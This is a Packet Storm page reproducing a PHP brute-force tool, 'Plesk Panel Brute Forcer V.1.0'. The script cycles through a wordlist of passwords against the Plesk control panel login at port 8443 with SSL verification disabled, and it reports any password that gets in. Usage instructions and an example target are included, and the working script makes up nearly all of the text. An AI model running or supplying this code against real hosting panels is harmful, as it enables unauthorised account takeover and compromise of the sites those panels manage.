This php script is a Plesk Panel brute forcing utility.
4f39c5c3c1f0bbfea67df3fa70f94dc5fdaef76f6e58e93fca95bb2e26d320b9<?php
/*
-----------------------------------------------------------------------------------
*Plesk Panel Brute Forcer V.1.0
*Coded By Burtay | cwburtay@hotmail.com
*Rootarea.com Megaturks.Net Burtay.Org Cyber-Warrior.Org
-----------------------------------------------------------------------------------
*Tested for -> Parallels Plesk Control Panel 8.6.0
*If you want to use another version of plesk ,please change "$postfields" variable's content.
*Usage -> php plesk-brute.php site.com username wordlist
*Dont Forget.Without http or https format in site.com
*Example -> php plesk-brute.php burtay.org admin mywl.txt
-----------------------------------------------------------------------------------
*/
set_time_limit(0);
class plesk_brute
{
private $regex = '<div class="msgError">';
private function post($url,$postfields)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,$postfields);
curl_setopt($curl,CURLOPT_URL,$url);
$kaynak = curl_exec($curl);
curl_close($curl);
return $kaynak;
}
private function wordlist_oku($wordlist)
{
return file($wordlist);
}
public function aban($url,$username,$wordlist)
{
echo "-------------------------------------------------------------\n";
echo "Plesk Panel Brute Forcer V.1.0 \n";
echo "Coded by Burtay \n";
echo "Rootarea.com Megaturks.Net Burtay.Org Cyber-Warrior.Org\n\n";
$liste = $this->wordlist_oku($wordlist);
foreach($liste as $password)
{
echo "[+]Testing -> ".trim($password)."\n";
$postfields = "passwd=".trim($password)."&login_locale=default&login_name=".$username;
$kaynak = $this->post($url,$postfields);
if(!eregi($this->regex,$kaynak))
{
echo "[+]Password Cracked -> ".$password;
die("\nThe End Lan");
}
}
}
}
$class = new plesk_brute();
$class->aban("https://".$argv[1].":8443/login_up.php3",$argv[2],$argv[3]);
?>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed